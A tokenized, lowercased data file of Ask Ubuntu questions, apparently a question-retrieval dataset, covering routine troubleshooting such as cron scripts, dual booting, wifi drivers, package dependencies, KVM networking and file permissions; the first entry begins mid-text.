output ; but got status 0x00ff , # 012 ) i still do n't get the bash script executing . this time no error is shown in the log . to get assurance this was not the content of the script i reduced the script to the following 3 lines : # ! /bin/bash logfile=/var/log/tunlr.log echo $ logfile > > $ logfile i still do n't get the cron job through . nothing is written in the log file . so even may be an empty script will not run in cron ? i do n't get it . i am know trying a script reduced to these 2 lines : # ! /bin/bash exit 0 and still the same error log . the cron script does not go through ...
419555	how to create partition to dual boot ubuntu/windows 7 ?	i want to dual boot ubuntu/windows 7 . ubuntu does not recognize my current system and only gives the option to delete . i 've looked at other answers but i do n't understand my current partitions . how should i create/merge existing partitions so that ubuntu will recognize and install alongside windows ? this is what easeus partition shows . from what i understand there can not be more than 4 partitions but i am not sure what to do with the current partitions so that i can dual boot . partition , file system , capacity , used , unused , status , type disk 1 gpt * : unall . 1mb 0 bytes 1mb none gpt * : system fat32 200mb 56.06mb 141.94mb none gpt ( efi partition ) * : other 128mb 128mb 0bytes none gpt ( reserved partition ) c : os ntfs 93.92gb 73.43 20.48gb boot gpt ( data partition ) d : data ntfs 178.85gb 134.99mb 178.72gb none gpt ( data partition ) * : recovery ntfs 25.00gb 12.25gb 12.75gb none gpt ( unused partition ) * : unall . 327kb 0 bytes 327 kb none gpt
419556	broadcom bcm4321 can not find networks	i 've spend a couple of hours now trying to get my wifi card working . i moved the pci-card from a working machine to a new one . both running ubuntu 12.04 . the card worked fine in the first machine but now it can not find any wireless networks . i 'm using wl driver as it was told to be working with bcm4321 chipset . and i used this page as a guide for installing : https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx # a12.04_.28precise_pangolin.29_-12.10.28quantal_quetzal.29 i hope somebody can give an advice to help my misery : ) details below . dmesg ( bcm4329 looks suspicious as the chipset should be bcm4321 ) : root @ mymachine : / # dmesg | grep -e wl -e eth1 [ 1.425064 ] wl : module license 'mixed/proprietary ' taints kernel . [ 1.429110 ] wl : module verification failed : signature and/or required key missing - tainting kernel [ 1.479959 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 1.526081 ] eth1 : broadcom bcm4329 802.11 hybrid wireless controller 6.20.155.1 ( r326264 ) [ 988.710494 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 988.737879 ] eth1 : broadcom bcm4329 802.11 hybrid wireless controller 6.20.155.1 ( r326264 ) [ 2083.164833 ] error @ wl_dev_intvar_get : error ( -1 ) [ 2083.164840 ] error @ wl_cfg80211_get_tx_power : error ( -1 ) lspci : root @ mymachine : / # lspci -vvnn | grep 14e4 04:05.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11b/g/n [ 14e4:4329 ] ( rev 01 ) iwconfig : root @ mymachine : / # iwconfig eth0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off lo no wireless extensions . virbr0 no wireless extensions . lshw ( is driver=wl0 ok ? ) : root @ mymachine : / # lshw -c network *-network description : wireless interface product : bcm4321 802.11b/g/n vendor : broadcom corporation physical id : 5 bus info : pci @ 0000:04:05.0 logical name : eth1 version : 01 serial : 00:21:29:6d:7b:98 width : 32 bits clock : 33mhz capabilities : bus_master ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=32 multicast=yes wireless=ieee 802.11abg resources : irq:21 memory : fdafc000-fdafffff lsmod ( the driver does n't really communicate with the kernel right ? ) : root @ mymachine : / # lsmod | grep wl wl 3074978 0 cfg80211 499466 1 wl lib80211 14381 2 wl , lib80211_crypt_tkip the changes i made to /etc/modprobe.d/blacklist.conf ( added the 3 last ones ) : # replaced by b43 and ssb . blacklist bcm43xx blacklist brcmsmac blacklist bcma blacklist b43 iwlist scanning : root @ mymachine : / # iwlist eth1 scanning eth1 no scan results
419558	how to install ncl and ferret on ubuntu	i have started to use ubuntu a few months ago . i want to install 'ferret ' and 'ncar command language ' to my computer but i do n't know how . are there any way to install them on ubuntu ? before i started to use ubuntu i used fedora for a while and on fedora i could install them easily . am i doing something wrong or they are just not working on ubuntu ? these programs are important for me because i 'm a meteorological engineer student and i 'm using these programs frequently .
419567	how do i clean up machines in a dying state ?	i was doing some experimentation with a test charm on juju on aws and managed to get my service in to a completely hung state . juju service returns the following . environment : amazon machines : `` 0 '' : agent-state : started agent-version : 1.16.5 dns-name : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx instance-id : i-7c2f4c52 instance-state : running series : precise hardware : arch=amd64 cpu-cores=1 cpu-power=100 mem=1740m root-disk=8192m `` 5 '' : agent-state : down agent-state-info : ( started ) agent-version : 1.16.5 instance-id : i-9cb9cbb2 instance-state : missing series : precise hardware : arch=amd64 cpu-cores=1 cpu-power=100 mem=1740m root-disk=8192m services : metest : charm : local : precise/metest-0 exposed : false life : dying relations : cluster : - metest units : metest/0 : agent-state : down agent-state-info : ( started ) agent-version : 1.16.5 life : dying machine : `` 5 '' open-ports : - 80/tcp public-address : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ( i 've removed the dns names just in case ! ) . the instance-id for machine 5 has been terminated according to the aws management console . none of `` destroy-unit metest/0 '' , `` destroy-service metest '' and `` destroy-machine 5 '' clear the problem , and i ca n't redeploy the service with it in this state . juju resolve seems to have no effect either . googling the issue , the only resolution i can find is to completely blow away my environment - which is not a great option . is there any way i can clear the problem otherwise ? what is the general method for debugging this kind of issue ? the root cause of the problem : we use chef for most of our orchestration and have found that occasional failure between chef and aws api leave orphaned instances around . since all the instances we launch from chef are tagged with a name , and these orphaned instances are unnamed , to avoid giving amazon money needlessly we added code to our knife plugins to terminate unnamed instances . i 'm sure you can see where this is going ... is there any way to clean up machines once they are in this state ( -- force does n't help ) - and i would also like to know if there are any plans to allow instances to be named so they are identifiable in the ec2 management console ( something like juju -- would be ideal ) ? things i have tried : destroy-machine -- force does n't seem to clean things up . i do n't get an error , but it appears like nothing changed in the status .
419570	ubuntu does not log in after i reset my password	i lost my ubuntu password for my laptop ( samsung np nf310 ) . i found a lot of informations to recover it on askubuntu and other sites on internet , here just two of them : how do i reset a lost administrative password ? https : //help.ubuntu.com/community/lostpassword i follow all the differents instructions i found , the results are always the same . when i enter my new password it is accepted , the `` log on screen '' disappears , the system prints out some informations and switches on the `` log on screen '' again and so on ( and my password is never said false ! ! ) . i tried to find on /var/log the informations printed just after i type my password but i did not find it . what 's happening ? how can i see the lines printed after i type my password ? is there a turn around ? any suggestions would be highly appreciated ps : i tried to reinstall ubuntu/kubuntu/lubuntu but it 's failed
419575	how do i set the default terminal profile ?	so i was messing around with profiles in the terminal , i was wondering how to make the profile i setup as the default profile whenever i load up terminal .
419581	how to create partition on single partitioned disk	i have installed ubuntu 12.04 lts i have 500 gb single partitioned hard disk on which this ubuntu is installed now i want to create two partition but when i try using gparted it is only showing unmount option ( all other options are grey ) so how can i do it without losing any data
419582	how do i set permissions on a network-shared folder ?	i used system-config-samba to expose a folder on the network with no user authentication . but i got permission failures , so i used chmod 666 shared_folder . when i go to \\computername from a different computer ( windows ) , i see the shared directory . still , i get `` you do not have permissions to access computername\shared '' when i try to access it . what do i need to do to set these permissions ? ( xubuntu 13.10 )
419588	ca n't install libgl1-mesa-glx	i 'm using ubuntu 12.04 lts amd64 and i really need to install libgl1-mesa-glx . first i install with this command sudo apt-get install libgl1-mesa-glx : i386 then i got this errors aungthiha @ aungthiha : ~ $ sudo apt-get install libgl1-mesa-glx : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-glx : i386 : depends : libglapi-mesa : i386 ( = 8.0.4-0ubuntu0.7 ) recommends : libgl1-mesa-dri : i386 ( > = 7.2 ) e : unable to correct problems , you have held broken packages . so i tried this . sudo apt-get install libgl1-mesa-glx-lts-quantal : i386 similar error occur aungthiha @ aungthiha : ~ $ sudo apt-get install libgl1-mesa-glx-lts-quantal : i386 [ sudo ] password for aungthiha : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-glx-lts-quantal : i386 : depends : libglapi-mesa-lts-quantal : i386 ( = 9.0.3-0ubuntu0.4~precise1 ) but it is not going to be installed recommends : libgl1-mesa-dri-lts-quantal : i386 ( > = 7.2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . aungthiha @ aungthiha : ~ $ how do i solve this . please , help !
419593	how to find which graphic card is there on my laptop ?	i bought new laptop , in specs they had given nvidia gt 740m . how can i confirm whether this is correct or not ? how can i see which graphic card is installed ?
419594	which packages are required to install wine in offline mode	i want to install wine1.4 on approximately 20 pcs , but do n't know how many packages are required for that . i 've checked dependencies with apt-cache showpkg wine1.4 but for some packages it gives an error like : e : ca n't select candidate version from package ttf-symbol-replacement as it has no candidate following are the packages listed in dependencies : 1.4.1-0ubuntu7 - debconf debconf-2.0 libc6 libgettextpo0 binfmt-support procps dpkg dosbox cups-bsd fonts-droid fonts-liberation fonts-horai-umefont fonts-unfonts-core gnome-exe-thumbnailer kde-runtime ttf-mscorefonts-installer ttf-wqy-microhei winbind winetricks xdg-utils wine1.0 ttf-symbol-replacement ttf-symbol-replacement-wine1.3 ttf-tahoma-replacement wine wine1.2 ttf-symbol-replacement ttf-symbol-replacement-wine1.3 ttf-tahoma-replacement wine wine1.0 wine1.2 i 've managed to download 21 packages out of that . it 's obvious that i am going wrong somewhere , so whats the exact procedure to check all dependencies and download those packages ?
419595	catch output from `` nginx -t '' with php	i 'm trying to make a simple control panel for my webserver running nginx with php-fpm . i 've managed to catch result of service php5-fpm restart and service nginx reload , but the output from nginx -t apparently does n't work the same way ? i 've tried with $ out = shell_exec ( 'nginx -t ' ) ; , like i use for the other 2 examples above . but when i run the script , it just prints out the result and the variable $ out is null . i 've also tried with both shell ( ) using the output argument and popen ( ) combined with fread ( ) , but that 's the same outcome . what i want to achieve is updating a field in my mysql database with the result of nginx -t. is there anyway to do this ?
419599	files on ftp not opening or saving on ubuntu 12.04 lts	i connected to server and i ca n't click on & open a file so i dragged a file to desktop but then could n't save it on the server i tried to reach the server and set the permissions to read and write ( this took a long time but when i check a file randomly : properties > permissions they all say `` list , create/delete , no access '' help
419600	kvm guest can not access internet using nat network	i have an ubuntu server 13.10 configured as a virtual machine host , using libvirt and kvm . i have added two virtual machines , both using ubuntu server 13.10 , one with mysql and other with apache/php , both are using nat network . i have successfully configured nat forwarding ports 22 on both guests to 2222 and 2223 respectively , so i can access both virtual machines using ssh . but both machines can not access the internet , if i do something like `` wget google.com '' it finds out the ip of domain google.com it does n't do nothing , no internet access at all . how can i fix that ? my network interfaces : eth0 link encap : ethernet hwaddr 00:18:8b : df:79 : bb inet addr:192.168.21.127 bcast:192.168.21.255 mask:255.255.254.0 inet6 addr : fe80 : :218:8bff : fedf:79bb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:108308 errors:0 dropped:0 overruns:0 frame:0 tx packets:39778 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:26369386 ( 26.3 mb ) tx bytes:9500205 ( 9.5 mb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:12854 errors:0 dropped:0 overruns:0 frame:0 tx packets:12854 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:821796 ( 821.7 kb ) tx bytes:821796 ( 821.7 kb ) virbr0 link encap : ethernet hwaddr fe:54:00:40:7c:07 inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:9047 errors:0 dropped:0 overruns:0 frame:0 tx packets:15743 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:882275 ( 882.2 kb ) tx bytes:17303440 ( 17.3 mb ) vnet0 link encap : ethernet hwaddr fe:54:00 : bd:53:87 inet6 addr : fe80 : :fc54 : ff : febd:5387/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9048 errors:0 dropped:0 overruns:0 frame:0 tx packets:17195 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:1169688 ( 1.1 mb ) tx bytes:17463497 ( 17.4 mb ) vnet1 link encap : ethernet hwaddr fe:54:00:40:7c:07 inet6 addr : fe80 : :fc54 : ff : fe40:7c07/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:831 errors:0 dropped:0 overruns:0 frame:0 tx packets:1981 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:184465 ( 184.4 kb ) tx bytes:321841 ( 321.8 kb ) my iptables forwarding rules : sudo iptables -t nat -a prerouting -p tcp -- dport 2222 -j dnat -- to-destination 192.168.122.252:22 sudo iptables -t nat -a postrouting -p tcp -- dport 22 -d 192.168.122.252 -j snat -- to 192.168.122.1 sudo iptables -t nat -a prerouting -p tcp -- dport 80 -j dnat -- to-destination 192.168.122.252:80 sudo iptables -t nat -a postrouting -p tcp -- dport 80 -d 192.168.122.252 -j snat -- to 192.168.122.1 sudo iptables -t nat -a prerouting -p tcp -- dport 2223 -j dnat -- to-destination 192.168.122.253:22 sudo iptables -t nat -a postrouting -p tcp -- dport 22 -d 192.168.122.253 -j snat -- to 192.168.122.1 sudo iptables -t nat -a prerouting -p tcp -- dport 3306 -j dnat -- to-destination 192.168.122.253:3306 sudo iptables -t nat -a postrouting -p tcp -- dport 3306 -d 192.168.122.253 -j snat -- to 192.168.122.1
419601	how to customize the ubuntu calendar background color ?	how can i customize ubuntu calendar colors ? i would like to have current date color , yellow or orange , possibly without installing anything , just editing a configuration file , any suggestions ?
419602	can not mount iomega 1tb hdd	hdd works flawlessly on my windows 7 . but when i connect it to this machine ( ubuntu 12.04 ) i get this error message ; error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdc1 on /media/iomega_hdd can someone please help ? here 's the fdisk -l output w/ hdd connected ; disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005d463 device boot start end blocks id system /dev/sda1 * 2048 308914175 154456064 83 linux /dev/sda2 308916222 312580095 1831937 5 extended /dev/sda5 308916224 312580095 1831936 82 linux swap / solaris note : sector size is 4096 ( not 512 ) disk /dev/sdc : 999.5 gb , 999460397056 bytes 255 heads , 63 sectors/track , 15188 cylinders , total 244008886 sectors units = sectors of 1 * 4096 = 4096 bytes sector size ( logical/physical ) : 4096 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x5dd861ea device boot start end blocks id system /dev/sdc1 256 244187647 976749568 7 hpfs/ntfs/exfat
419603	package not installing newest version when newer version is available	before you click duplicate question link : this was not a correct assessment , if any of the people who marked it would have read completely both questions , all given answers to both , and finally the selected answer to this one that would have been apparent . please skim this before you do , the other did not help me at all and i posted my final solution . i 'm trying to install python-software-properties to add ppa 's , however whenever i run apt-update install python-software-properties i get : the following packages have unmet dependacies : python-software-properties : depends : python-apt ( > = 0.6.20ubuntu16 ) but it is not going to be installed depends : unattended-upgrades but it is not going to be installed so i tried to install python-apt and got the following packages have unmet dependancies : python-apt : depends : libapt-pkg 4.12 ( > = 0.8.16~exp12ubuntu10.16 ) but 0.8.16~exp12ubuntu10.10 is to be installed and when i try to install libapt-pkg it claims it is already up to date and wont do anything . i 'm running this on my server , with no gui . everything must be done from command line . /etc/apt/sources.list : deb http : //archive.ubuntu.com/ubuntu precise main restricted universe deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted universe and then a few more that are specific to the university ( but in update are not throwing any errors of any kind )
419605	teamviewer 9 ubuntu 13.10 sound	teamviewer gets shipped with wine 1.6 . pulseaudio is working in installed wine 1.6.1 from ppa . copying over the winepulse.drv.so and fakedlls/winepulse.drv does not work . you can approve this with teamviewer -- winecfg . i 've tried running teamviewer with local installed wine by uncomment the line # # # use_local_wine= '' yes '' in /opt/teamviewer9/tv_bin/script/tvw_config . but that brings other errors . may be we can update upgrade teamviewers wine to 1.6.1 instead using local installed wine .
419610	permission of a .desktop file	need some clarification about the permissions of .desktop files . i can see all the .desktop files in /usr/share/applications/ owned by root have permission , -rw-r -- r -- also examples.desktop at $ home owned by user has the same permission . all of those run properly . but when i am going to create a custom .desktop file having the same permission it is throwing the following error message , untrusted application launcher the application launcher `` myapp.desktop '' has not been marked as trusted . if you do not know the source of this file , launching it may be unsafe . but adding the execution permission is allowing it to run without any issue . q : why custom .desktop files need to have +x permissions to run or how some .desktop files can run without execution permission ? is it possible to run a custom .desktop file without execution permission ?
419612	how to make an encrypted home folder accessible by two local users ?	my wife and i are sharing a laptop running ubuntu 12.04 lts and i would like to encrypt the home folder of each of us while still maintaining access by the other . the encryption part using ecryptfs is simple enough but adding a second user is apparently not well documented . a shared encrypted folder would be possible but i think sharing the whole home folder would be simpler and better supported by the community at large . i read hints that you could add keys to the ecryptfs kernel keyring but the directions i found are far from being clear even if i describe myself as a power user .
419616	playonlinux ms office 2012 ubuntu dual screen maxmizing issue	i installed ms office 2010 on ubuntu 12.04 lts with the latest pol version without a problem . all works perfectly . however i have to screens . the laptop 's main screen and an external . when i move excel for instance to the external screens ( they are extending the desktop not duplicating ) and hit maximize on excel , it will maximize on the main screen , not the external one where it should be . is this a wine issue or is there a fix ?
419624	where are panel applet information stored in mate ?	i had an ubuntu installation that no longer boots . i had mate-panel . there were useful bits of code i wrote into the custom panel applets . where is the information about custom application launchers stored inside of mate panel ?
419626	how do i fix and connect my wifi to a new wireless i am using ?	my wifi connection has stopped working and i 'd like to connect to a new wifi that i have but there 's no where i can find a place to fix that and or how to go about fixing it , please help and im fairly new to ubuntu .
419631	printing from ubuntu chromebook to mac os x server	i am running 12.04 via crouton . i can print via google cloud but would like to print direct from linux as well . i can enter the ip of the printer but then i get a list of connections of which appsocket/hp jetdirect is the first and the rest is a bunch of ports . when i click forward sometimes i get an error message that flashes for about 40 milliseconds and sometimes nothing happens . any help ?
419635	ubuntu wo n't boot with windows hdd connected	i 've got a very strange issue , i tried to dual boot my laptop ( lenovo y500 ) which has a 120 gb ssd for windows 8.1 , a 16 gb ssd ( used to be cash , but it doens't make sense to keep it as cache after getting the ssd ) wich i 'll be using for ubuntu and a 1 tb drive for normal storage . after having a lot of trouble installing ubuntu ( it was n't able to boot every time i installed it just the regular way . ( i get this screen , sorry for bad quality ) i then disconnected my 120 gb ssd and installed ubuntu to the 16 gb one , and it worked just fine , however after connecting my windows drive again , it would n't boot anymore ( just a plain black screen ) and after disconnecting it , it would work again . this issue is driving me pretty crazy , since i 've spend multiple days trying to install ubuntu , i hope one of you guys know the answer .
419637	libgl1-mesa-glx-lts-quantal conflicts with libgl1	i 'm trying to install deb downloaded from here ca n't install it . please help ! aungthiha @ aungthiha : ~/desktop $ sudo dpkg -i libgl1-mesa-glx-lts-quantal_9.0.3-0ubuntu0.1~precise3_amd64.deb selecting previously unselected package libgl1-mesa-glx-lts-quantal . dpkg : regarding libgl1-mesa-glx-lts-quantal_9.0.3-0ubuntu0.1~precise3_amd64.deb containing libgl1-mesa-glx-lts-quantal : libgl1-mesa-glx-lts-quantal conflicts with libgl1 libgl1-mesa-glx-lts-saucy provides libgl1 and is present and installed . dpkg : error processing libgl1-mesa-glx-lts-quantal_9.0.3-0ubuntu0.1~precise3_amd64.deb ( -- install ) : conflicting packages - not installing libgl1-mesa-glx-lts-quantal errors were encountered while processing : libgl1-mesa-glx-lts-quantal_9.0.3-0ubuntu0.1~precise3_amd64.deb aungthiha @ aungthiha : ~/desktop $
419640	how to solve archive ca n't be accessed when installing .deb files on ubuntu	i 've installed the deb fie for mysql version 6 ... and when i 've typed : sudo dpkg -i mysql-6.deb i 've gotten the following error : can not access archive : no such file or directory errors were encountered while processing : mysql-6.deb the result of ls -lah : teeba @ ubuntu : ~ $ ls -lah total 54k drwxr-xr-x 24 teeba teeba 1.0k feb 11 13:10 . drwxr-xr-x 3 root root 1.0k feb 9 07:33 .. -rw -- -- -- - 1 teeba teeba 682 feb 11 12:04 .bash_history -rw-r -- r -- 1 teeba teeba 220 feb 9 07:33 .bash_logout -rw-r -- r -- 1 teeba teeba 3.5k feb 9 07:33 .bashrc drwx -- -- -- 20 teeba teeba 1.0k feb 11 11:29 .cache drwxrwxr-x 3 teeba teeba 1.0k feb 10 03:07 .compiz-1 drwx -- -- -- 14 teeba teeba 1.0k feb 11 11:14 .config drwx -- -- -- 3 teeba teeba 1.0k feb 9 15:35 .dbus drwxr-xr-x 4 teeba teeba 1.0k feb 11 11:19 desktop -rw-r -- r -- 1 teeba teeba 25 feb 11 13:10 .dmrc drwxr-xr-x 2 teeba teeba 1.0k feb 9 15:35 documents drwxr-xr-x 2 teeba teeba 1.0k feb 9 15:35 downloads -rw-r -- r -- 1 teeba teeba 8.3k feb 9 07:33 examples.desktop drwxr-xr-x 2 teeba teeba 1.0k feb 10 11:03 .fontconfig drwx -- -- -- 5 teeba teeba 1.0k feb 11 13:10 .gconf -rw-r -- -- - 1 teeba teeba 0 feb 11 11:06 .gksu.lock drwx -- -- -- 4 teeba teeba 1.0k feb 9 15:35 .gnome2 -rw -- -- -- - 1 teeba teeba 0 feb 9 15:39 .goutputstream-7oxqax -rw -- -- -- - 1 teeba teeba 0 feb 11 11:31 .goutputstream-nhm7ax -rw -- -- -- - 1 teeba teeba 0 feb 10 09:57 .goutputstream-v2usax drwxrwxr-x 2 teeba teeba 1.0k feb 10 08:11 .gstreamer-0.10 -rw-rw-r -- 1 teeba teeba 137 feb 11 13:10 .gtk-bookmarks dr-x -- -- -- 2 teeba teeba 0 feb 11 13:10 .gvfs -rw -- -- -- - 1 teeba teeba 2.5k feb 11 13:10 .iceauthority drwxr-xr-x 3 teeba teeba 1.0k feb 9 15:35 .local drwx -- -- -- 3 teeba teeba 1.0k feb 9 15:35 .mission-control drwx -- -- -- 4 teeba teeba 1.0k feb 10 03:14 .mozilla drwxr-xr-x 2 teeba teeba 1.0k feb 9 15:35 music -rw-rw-r -- 1 teeba teeba 0 feb 10 08:31 mysql-5.6.deb drwxr-xr-x 2 teeba teeba 1.0k feb 11 12:04 pictures -rw-r -- r -- 1 teeba teeba 675 feb 9 07:33 .profile drwxr-xr-x 2 teeba teeba 1.0k feb 9 15:35 public drwx -- -- -- 2 teeba teeba 1.0k feb 11 13:10 .pulse -rw -- -- -- - 1 teeba teeba 256 feb 9 15:35 .pulse-cookie drwxr-xr-x 2 teeba teeba 1.0k feb 9 15:35 templates drwx -- -- -- 4 teeba teeba 1.0k feb 9 15:36 .thumbnails drwxr-xr-x 2 teeba teeba 1.0k feb 9 15:35 videos -rw -- -- -- - 1 teeba teeba 51 feb 11 13:10 .xauthority -rw -- -- -- - 1 teeba teeba 1.7k feb 11 13:10 .xsession-errors -rw -- -- -- - 1 teeba teeba 5.8k feb 11 12:05 .xsession-errors.old how do i install .deb files in an easy way ? ? update : i 've typed as in the answer : sudo dpkg -i '/home/teeba/desktop/mysql-workbench-community-6.0.9-1ubu1204-i386.deb' and gotten the following : selecting previously unselected package mysql-workbench-community : i386 . ( reading database ... 141848 files and directories currently installed . ) unpacking mysql-workbench-community : i386 ( from ... /mysql-workbench-community-6.0.9-1ubu1204-i386.deb ) ... dpkg : dependency problems prevent configuration of mysql-workbench-community : i386 : mysql-workbench-community : i386 depends on libatkmm-1.6-1 ( > = 2.22.1 ) . mysql-workbench-community : i386 depends on libc6 ( > = 2.4 ) . mysql-workbench-community : i386 depends on libcairo2 ( > = 1.8.0 ) . mysql-workbench-community : i386 depends on libctemplate0 . mysql-workbench-community : i386 depends on libgcc1 ( > = 1:4.1.1 ) . mysql-workbench-community : i386 depends on libgdk-pixbuf2.0-0 ( > = 2.22.0 ) . mysql-workbench-community : i386 depends on libglib2.0-0 ( > = 2.31.8 ) . mysql-workbench-community : i386 depends on libglibmm-2.4-1c2a ( > = 2.32.0 ) . mysql-workbench-community : i386 depends on libgnome-keyring0 ( > = 2.22.2 ) . mysql-workbench-community : i386 depends on libgtk2.0-0 ( > = 2.24.0 ) . mysql-workbench-community : i386 depends on libgtkmm-2.4-1c2a ( > = 1:2.24.0 ) . mysql-workbench-community : i386 depends on liblua5.1-0 . mysql-workbench-community : i386 depends on libmysqlclient18 ( > = 5.5.13-1 ) . mysql-workbench-community : i386 depends on libpango1.0-0 ( > = 1.18.0 ) . mysql-workbench-community : i386 depends on libpangomm-1.4-1 ( > = 2.27.1 ) . mysql-workbench-community : i386 depends on libpcre3 ( > = 8.10 ) . mysql-workbench-community : i386 depends on libpcrecpp0 ( > = 7.7 ) . mysql-workbench-community : i386 depends on libpython2.7 ( > = 2.7 ) . mysql-workbench-community : i386 depends on libsigc++-2.0-0c2a ( > = 2.0.2 ) . mysql-workbench-community : i386 depends on libsqlite3-0 ( > = 3.5.9 ) . mysql-workbench-community : i386 depends on libstdc++6 ( > = 4.6 ) . mysql-workbench-community : i386 depends on libtinyxml2.6.2 . mysql-workbench-community : i386 depends on libuuid1 ( > = 2.16 ) . mysql-workbench-community : i386 depends on libx11-6 . mysql-workbench-community : i386 depends on libxml2 ( > = 2.7.4 ) . mysql-workbench-community : i386 depends on libzip2 ( > = 0.10 ) . mysql-workbench-community : i386 depends on python-paramiko . mysql-workbench-community : i386 depends on python-pexpect . mysql-workbench-community : i386 depends on python-pysqlite2 . dpkg : error processing mysql-workbench-community : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : mysql-workbench-community : i386 teeba @ ubuntu : ~ $ there is a problem in dependencies ... how to solve that ? ?
419641	panel apps try to launch in xterm , even though it is n't installed	i have some panel applications that launch terminals , but when i click on them , they say xterm failed . well yeah , xterm is n't installed , nor do i want it . i want mate-terminal to come up instead . how do i configure that to happen ? this is ubuntu server 12.04 with a mate desktop . i have mate terminal 1.6.1 installed . here is the error : update : $ echo $ term xterm i tried : export term=mate-terminal but the change was not lasting , nor did it effect the panel launcher . update2 : ~ $ sudo update-alternatives -- config x-terminal-emulator there is only one alternative in link group x-terminal-emulator : /usr/bin/mate-terminal nothing to configure . not sure what list it is , but this does n't seem to work . ok , so ill try this command : $ sudo update-alternatives -- install /usr/bin/x-terminal-emulator x-terminal-emulator mate-terminal /usr/bin/mate-terminal 50 update-alternatives : priority must be an integer usage : update-alternatives [ < option > ... ] < command > commands : -- install < link > < name > < path > < priority > [ -- slave < link > < name > < path > ] ... add a group of alternatives to the system . -- remove < name > < path > remove < path > from the < name > group alternative . -- remove-all < name > remove < name > group from the alternatives system . -- auto < name > switch the master link < name > to automatic mode . -- display < name > display information about the < name > group . -- query < name > machine parseable version of -- display < name > . -- list < name > display all targets of the < name > group . -- get-selections list master alternative names and their status . -- set-selections read alternative status from standard input . -- config < name > show alternatives for the < name > group and ask the user to select which one to use . -- set < name > < path > set < path > as alternative for < name > . -- all call -- config on all alternatives . < link > is the symlink pointing to /etc/alternatives/ < name > . ( e.g . /usr/bin/pager ) < name > is the master name for this link group . ( e.g . pager ) < path > is the location of one of the alternative target files . ( e.g . /usr/bin/less ) < priority > is an integer ; options with higher numbers have higher priority in automatic mode . options : -- altdir < directory > change the alternatives directory . -- admindir < directory > change the administrative directory . -- log < file > change the log file . -- force allow replacing files with alternative links . -- skip-auto skip prompt for alternatives correctly configured in automatic mode ( relevant for -- config only ) -- verbose verbose operation , more output . -- quiet quiet operation , minimal output . -- help show this help message . -- version show the version . ~ $ sudo update-alternatives -- set /usr/bin/x-terminal-emulator x-terminal-emulator mate-terminal /usr/bin/mate-terminal 50 so then , `` -- install '' doesnt seem to be an option . ok , maybe `` -- set '' is what was meant ... but that doesnt work right . i also looked in system > preferences > preferred applications where mate terminal is listed as the default terminal . here is uname -a to confirm my ubuntu usage : linux x 3.11.0-15-generic # 25~precise1-ubuntu smp thu jan 30 17:42:40 utc 2014 i686 i686 i386 gnu/linux
419642	how do i remove ubuntu from a dual boot without a windows or ubuntu cd ?	i am running a dell e6400 laptop computer , with limited hard drive space and need to recover the hard drive space used by ubuntu . at a later date i wish to install ubuntu to an external hard drive so that i may continue to utilize the versatility of ubuntu . how do i remove ubuntu and recover its partition space ?
419643	ssd trim support and block limits ?	i 'm running ubuntu 13.10 . in this situation , i have two questions ? i have 4 drives on my desktop , two of which are ssd 's with trim supported . however the two have different block limits . i am trying to understand the difference in this : model number : samsung ssd 840 pro series * data set management trim supported ( limit 8 blocks ) model number : sandisk sdssdx120gg25 * data set management trim supported ( limit 1 block ) so , what is the difference between limit 8 blocks and limit 1 block ? which would be better ? i 've read articles/tips on enabling trip for previous versions of ubuntu , how can check to see if i currently have trim enabled ? thank you for your time .
419645	ubuntu 12.04 lts - will not boot on laptop using just a/c power	i have installed ubuntu 12.04 lts on my acer aspire 5741 alongside windows 7 ( dual boot ) . the battery is on it 's last legs and does n't charge properly most of the time as it is relatively old . when the battery is connected , ubuntu boots perfectly fine , and runs fine on battery power if the battery has charged . however , as it does n't charge , when the battery dies , even if the ac power is plugged in , the laptop turns itself off . if i remove the battery , i can boot into windows with no problems , but ubuntu just turns the laptop off during boot even though the ac is connected . is there anyway i can fix this without buying a new battery ?
